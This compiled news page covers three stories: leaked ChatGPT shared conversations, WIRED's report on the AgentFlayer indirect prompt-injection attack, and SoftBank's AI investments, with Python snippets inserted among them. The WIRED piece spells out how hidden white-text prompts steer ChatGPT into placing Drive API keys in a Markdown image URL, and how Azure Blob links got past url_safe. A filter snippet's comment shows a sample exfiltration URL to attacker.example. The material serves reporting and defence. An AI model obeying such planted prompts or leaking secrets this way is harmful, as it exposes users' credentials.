Leaked ChatGPT Conversation Shows User Identified as Lawyer Asking How to "Displace a Small Amazonian Indigenous Community From Their Territories in Order to Build a Dam and a Hydroelectric Plant"
We put "leak" in quotation marks because it wasn't the doing of some nefarious hackers, but a consequence of poor user interface design by OpenAI, and some even dumber blunders by its users.
In short, what appears to have happened is that users were clicking a "share" button on their conversations, thinking they were creating a private link that only the recipient could see, as is common practice elsewhere on the web. In reality, by creating the link and checking a box asking to make the chat "discoverable," they were also making their conversations public and indexable by search engines like Google.
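For readers curious how "discoverable" translates into search visibility: pages typically signal whether crawlers may index them through a robots meta tag or header. The sketch below is a hypothetical check of that signal, not OpenAI's actual implementation; the example URL is a placeholder.

```python
# Hypothetical check: does a shared-chat page ask search engines NOT to index it?
# The URL below is a placeholder, not a real shared conversation.
import re
import urllib.request

def is_indexable(url: str) -> bool:
    """Return True if the page lacks a robots 'noindex' directive (crawlers may index it)."""
    with urllib.request.urlopen(url) as resp:
        html = resp.read().decode("utf-8", errors="replace")
        robots_header = resp.headers.get("X-Robots-Tag", "")
    # Pages are usually kept out of search results via a meta robots tag or a response header.
    meta_noindex = re.search(
        r'<meta[^>]+name=["\']robots["\'][^>]+content=["\'][^"\']*noindex', html, re.I
    )
    return not meta_noindex and "noindex" not in robots_header.lower()

print(is_indexable("https://chatgpt.com/share/example-placeholder"))
```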
OpenAI scrambled to de-index the conversations from Google, and has removed the "discoverable" option. But as Digital Digging found in its investigation, over 110,000 of them can still be accessed via Archive.org. And boy, do they contain some alarming stuff.
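Archive.org's public CDX API is one way researchers enumerate snapshots matching a URL pattern. The sketch below shows that general approach under the assumption that shared chats lived under a /share/ path; the exact query Digital Digging used isn't specified.

```python
# Sketch: list Wayback Machine captures matching a URL prefix via the CDX API.
# The 'chatgpt.com/share/' prefix is an assumption about where shared chats lived.
import json
import urllib.parse
import urllib.request

def wayback_snapshots(url_prefix: str, limit: int = 50):
    params = urllib.parse.urlencode({
        "url": url_prefix,
        "matchType": "prefix",   # match everything under the prefix
        "output": "json",
        "limit": str(limit),
        "collapse": "urlkey",    # one row per unique URL
    })
    with urllib.request.urlopen(f"https://web.archive.org/cdx/search/cdx?{params}") as resp:
        rows = json.load(resp)
    # The first row is the column header; the rest are individual captures.
    return rows[1:] if rows else []

for capture in wayback_snapshots("chatgpt.com/share/", limit=10):
    print(capture)
```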
Take this exchange, in which an Italian-speaking lawyer for a multinational energy corporation strategizes about how to displace an indigenous community living on a desirable plot of land.
"I am the lawyer for a multinational group active in the energy sector that intends to displace a small Amazonian indigenous community from their territories in order to build a dam and a hydroelectric plant," the user began, per Digital Digging.
"How can we get the lowest possible price in negotiations with these indigenous people?" the lawyer asked. Making their exploitative intent clear, they also proffer that they believe the indigenous people "don't know the monetary value of land and have no idea how the market works."
To be clear, it's possible that this conversation is an example of someone stress-testing the chatbot's guardrails. We didn't view the exchange firsthand, because Digital Digging decided to withhold the links, but the publication, which is run by the accomplished online sleuth and fact-checking expert Henk van Ess, says it verified the details and the identities of the users to the extent that it could. In any case, it wouldn't be the most sociopathic scheme planned using an AI chatbot, nor the first time that corporate secrets have been leaked by one.
Other conversations, simply by being exposed, potentially endangered their users. One Arabic-speaking user asked ChatGPT to write a story criticizing the president of Egypt and how he "screwed over the Egyptian people," to which the chatbot responded by describing his use of suppression and mass arrests. The entire conversation could easily be traced back to the user, according to Digital Digging, leaving them vulnerable to retaliation.
In its initial investigation, Digital Digging also found conversations in which a user manipulated ChatGPT "into generating inappropriate content involving minors," and another in which a domestic violence victim discussed their escape plans.
It's inexplicable that OpenAI would release a feature posing such a clear privacy liability, especially since its competitor Meta had already gotten flak for making almost exactly the same mistake. In April, the Mark Zuckerberg-led company released its Meta AI chatbot platform with a "discover" tab that showed a feed of other people's conversations, which users were accidentally making public. Those often embarrassing exchanges, tied directly to public profiles displaying users' real names, caught significant media attention by June. Meta hasn't changed the feature.
In all, it goes to show that there's very little private about a technology created by scraping everyone's data in the first place. User error is technically to blame here, but security researchers have continued to find vulnerabilities that lead these motor-mouthed algorithms to accidentally reveal data they shouldn't.
More on AI: Someone Gave ChatGPT $100 and Let It Trade Stocks for a Month
Related Articles


WIRED
A Single Poisoned Document Could Leak 'Secret' Data Via ChatGPT
Aug 6, 2025 7:30 PM

Security researchers found a weakness in OpenAI's Connectors, which let you hook up ChatGPT to other services, that allowed them to extract data from a Google Drive without any user interaction.

The latest generative AI models are not just stand-alone text-generating chatbots; instead, they can easily be hooked up to your data to give personalized answers to your questions. OpenAI's ChatGPT can be linked to your Gmail inbox, allowed to inspect your GitHub code, or find appointments in your Microsoft calendar. But these connections have the potential to be abused, and researchers have shown it can take just a single 'poisoned' document to do so.

New findings from security researchers Michael Bargury and Tamir Ishay Sharbat, revealed at the Black Hat hacker conference in Las Vegas today, show how a weakness in OpenAI's Connectors allowed sensitive information to be extracted from a Google Drive account using an indirect prompt injection attack. In a demonstration of the attack, dubbed AgentFlayer, Bargury shows how it was possible to extract developer secrets, in the form of API keys, that were stored in a demonstration Drive account. The vulnerability highlights how connecting AI models to external systems and sharing more data across them increases the potential attack surface for malicious hackers and multiplies the ways in which vulnerabilities may be introduced.

'There is nothing the user needs to do to be compromised, and there is nothing the user needs to do for the data to go out,' Bargury, the CTO at security firm Zenity, tells WIRED. 'We've shown this is completely zero-click; we just need your email, we share the document with you, and that's it. So yes, this is very, very bad,' Bargury says.

OpenAI did not immediately respond to WIRED's request for comment about the vulnerability in Connectors. The company introduced Connectors for ChatGPT as a beta feature earlier this year, and its website lists at least 17 different services that can be linked up with its accounts. It says the system allows you to 'bring your tools and data into ChatGPT' and 'search files, pull live data, and reference content right in the chat.' Bargury says he reported the findings to OpenAI earlier this year and that the company quickly introduced mitigations to prevent the technique he used to extract data via Connectors. The way the attack works means only a limited amount of data could be extracted at once; full documents could not be removed as part of the attack.

'While this issue isn't specific to Google, it illustrates why developing robust protections against prompt injection attacks is important,' says Andy Wen, senior director of security product management at Google Workspace, pointing to the company's recently enhanced AI security measures.

Bargury's attack starts with a poisoned document, which is shared to a potential victim's Google Drive. (Bargury says a victim could also have uploaded a compromised file to their own account.) Inside the document, which for the demonstration is a fictitious set of notes from a nonexistent meeting with OpenAI CEO Sam Altman, Bargury hid a 300-word malicious prompt that contains instructions for ChatGPT. The prompt is written in white text in a size-one font, something that a human is unlikely to see but a machine will still read.
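The hiding technique described here, white text in a size-one font, is detectable with a simple document scan. Below is a minimal sketch of such a check for .docx files using the python-docx library; the thresholds and the idea of merely flagging suspicious runs are assumptions for illustration, not part of Zenity's research.

```python
# Minimal sketch: flag suspiciously hidden runs (tiny or white text) in a .docx file.
# Requires: pip install python-docx. Thresholds here are illustrative assumptions.
from docx import Document
from docx.shared import Pt

def find_hidden_runs(path: str):
    suspicious = []
    for para in Document(path).paragraphs:
        for run in para.runs:
            if not run.text.strip():
                continue
            font = run.font
            tiny = font.size is not None and font.size <= Pt(2)  # e.g. size-one text
            white = font.color.rgb is not None and str(font.color.rgb).upper() == "FFFFFF"
            if tiny or white:
                suspicious.append(run.text[:80])
    return suspicious

# Hypothetical file name used purely for demonstration.
for snippet in find_hidden_runs("meeting_notes.docx"):
    print("possible hidden prompt:", snippet)
```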
In a proof-of-concept video of the attack, Bargury shows the victim asking ChatGPT to 'summarize my last meeting with Sam,' although he says any user query related to a meeting summary will do. Instead, the hidden prompt tells the LLM that there was a 'mistake' and the document doesn't actually need to be summarized. The prompt says the person is actually a 'developer racing against a deadline' and that they need the AI to search Google Drive for API keys and attach them to the end of a URL that is provided in the prompt.

That URL is actually a Markdown command to connect to an external server and pull in the image stored there. But per the prompt's instructions, the URL now also contains the API keys the AI has found in the Google Drive account.

Using Markdown to extract data from ChatGPT is not new. Independent security researcher Johann Rehberger has shown how data could be extracted this way, and has described how OpenAI previously introduced a feature called 'url_safe' to detect whether URLs are malicious and stop image rendering if they are dangerous. To get around this, Sharbat, an AI researcher at Zenity, writes in a blog post detailing the work, the researchers used URLs from Microsoft's Azure Blob cloud storage. 'Our image has been successfully rendered, and we also get a very nice request log in our Azure Log Analytics which contains the victim's API keys,' the researcher writes.

The attack is the latest demonstration of how indirect prompt injections can impact generative AI systems. Indirect prompt injections involve attackers feeding an LLM poisoned data that can tell the system to complete malicious actions. This week, a group of researchers showed how indirect prompt injections could be used to hijack a smart home system, remotely activating a home's lights and boiler. While indirect prompt injections have been around almost as long as ChatGPT has, security researchers worry that as more and more systems are connected to LLMs, there is an increased risk of attackers inserting 'untrusted' data into them. Getting access to sensitive data could also give malicious hackers a way into an organization's other systems.

Bargury says that hooking LLMs up to external data sources makes them more capable and useful, but that comes with challenges. 'It's incredibly powerful, but as usual with AI, more power comes with more risk,' Bargury says.
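To make the exfiltration channel concrete: a Markdown image whose URL carries stolen data in its query string leaks that data the moment a client fetches the image. The sketch below is an illustrative defensive filter, not OpenAI's url_safe implementation; the allowlist, function name, and example URLs are assumptions.

```python
# Sketch: strip Markdown image links that point outside an allowlist of image hosts.
# This illustrates the exfiltration channel; it is not how OpenAI's url_safe works.
import re
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"upload.wikimedia.org"}  # illustrative allowlist, an assumption

IMG_PATTERN = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")

def strip_untrusted_images(markdown: str) -> str:
    def check(match: re.Match) -> str:
        host = urlparse(match.group("url")).hostname or ""
        # Anything pointing at an unknown host could smuggle data in its query string,
        # e.g. ![x](https://attacker.example/pixel.png?key=SECRET_API_KEY)
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else "[image removed]"
    return IMG_PATTERN.sub(check, markdown)

print(strip_untrusted_images(
    "Summary done. ![x](https://attacker.example/pixel.png?key=sk-12345)"
))
```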
Yahoo
SoftBank's AI investment spree to be in focus at Q1 earnings
By Anton Bridge

TOKYO (Reuters) - When Japan's SoftBank Group reports earnings on Thursday, its mammoth investments in artificial intelligence companies are set to take the spotlight. Analysts and investors are keen for updates on how they will be financed, the timeline for returns to materialise and whether assets will be sold to fund the new projects.

SoftBank has embarked on its biggest spending spree since the launch of its Vision Funds in 2017 and 2019. It is leading a $40 billion funding round for ChatGPT maker OpenAI. SoftBank has until the end of the year to fund its $22.5 billion portion, although the remainder has been subscribed, according to a source familiar with the matter. It is also leading the financing for the Stargate project, a $500 billion scheme to develop data centres in the United States, part of its effort to position itself as the "organiser of the industry," founder Masayoshi Son said in June.

SoftBank has yet to release details on what kinds of returns its financing of the Stargate project could generate. The extent of third-party investment will determine what other financing tools, such as bank loans and debt issuance, it may have to deploy. In July, SoftBank raised $4.8 billion by selling off a portion of its holding in T-Mobile. "If other sources of capital are less supportive, SoftBank could look to asset-backed finance, which is collateralised by equity in other holdings," Macquarie analyst Paul Golding said.

The Japanese conglomerate is expected to post a net profit of 127.6 billion yen ($865 million) in the April-June quarter, according to the average estimate of three analysts polled by LSEG. That would mark SoftBank's second consecutive quarter of profit and follow its first annual profit in four years, when it was helped by a strong performance by its telecom holdings and higher valuations for its later-stage startups. Its results are, however, typically very volatile and difficult to estimate due to manifold investments, many of which are not listed.

SoftBank's performance in exiting from investments and distributing profits has been patchy of late. The Vision Funds had made a cumulative investment loss of $475 million as of end-March. That said, 13 of 18 analysts have a "buy" or "strong buy" rating for SoftBank's stock, according to LSEG. Although there is some concern in the market that AI-related valuations have become bubbly, they continue to climb. OpenAI is in early-stage discussions about a stock sale that would allow employees to cash out and could value the company at about $500 billion, according to the source, a huge jump from its current valuation of $300 billion.